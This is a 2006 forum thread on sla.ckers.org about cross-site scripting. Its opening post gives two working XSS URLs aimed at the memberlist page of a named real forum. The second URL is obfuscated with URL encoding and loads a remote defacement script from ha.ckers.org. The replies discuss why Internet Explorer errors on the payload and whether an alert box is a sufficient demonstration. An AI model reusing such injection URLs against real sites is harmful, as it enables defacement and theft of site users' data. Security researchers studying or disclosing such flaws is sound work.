Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
IE cannot open *******
Posted by: Kyran
Date: September 25, 2006 05:23PM

http://bbs.conqueronline.com/memberlist.php?memberlist.php?action=getall&what=%22%3E%3Cscript%3Ealert%20('XSS')%3C/script%3E&ltr=&perpage=25&orderby=username

That works in all browsers. But, the stallowned one errors IE.

http://bbs.conqueronline.com/memberlist.php?memberlist.php?action=getall&what=%22%3E%3C%73%63%72ipt%20%73%72%63%3D%68tt%70%3A%2F%2F%68%61.%63%6B%65%72%73.org%2Fs.%6As%3E%3C%2F%73%63%72%69%70%74%3E&ltr=&perpage=25&orderby=username

Any thoughts?

- Kyran

Options: ReplyQuote
Re: IE cannot open *******
Posted by: rsnake
Date: September 25, 2006 06:07PM

Hmm... no, I'm not sure why it's doing that... but this is exactly the reason I don't like using defacement style scripts - they muddy the water. You could easily parse it apart fix the issue and get it working, but why? The real issue is that it CAN include remote JavaScript. It's an interesting problem though. At what point does it make people aware (enough) of the dangers of the issue? Should I include scripts that kill people's browsers (a la http://ha.ckers.org/weird/popup.html ) or something similar? Personally I've always thought the alert box was sufficient to let people know the danger without actually causing anything on the page to die inadvertantly.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: IE cannot open *******
Posted by: Kyran
Date: September 25, 2006 06:25PM

I actually have been using just an alert as of late, but I frequent a section of that forum and someone asked "But it's just an alert, how is that affecting anyone?" so, I switched to stallowned.

- Kyran

Options: ReplyQuote
Re: IE cannot open *******
Posted by: WhiteAcid
Date: September 25, 2006 06:26PM

I made the sam error here: http://www.whiteacid.org/HTS/IE_bug.html

An explanation: http://www.shaftek.org/blog/archives/000212.html

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote


Sorry, only registered users may post in this forum.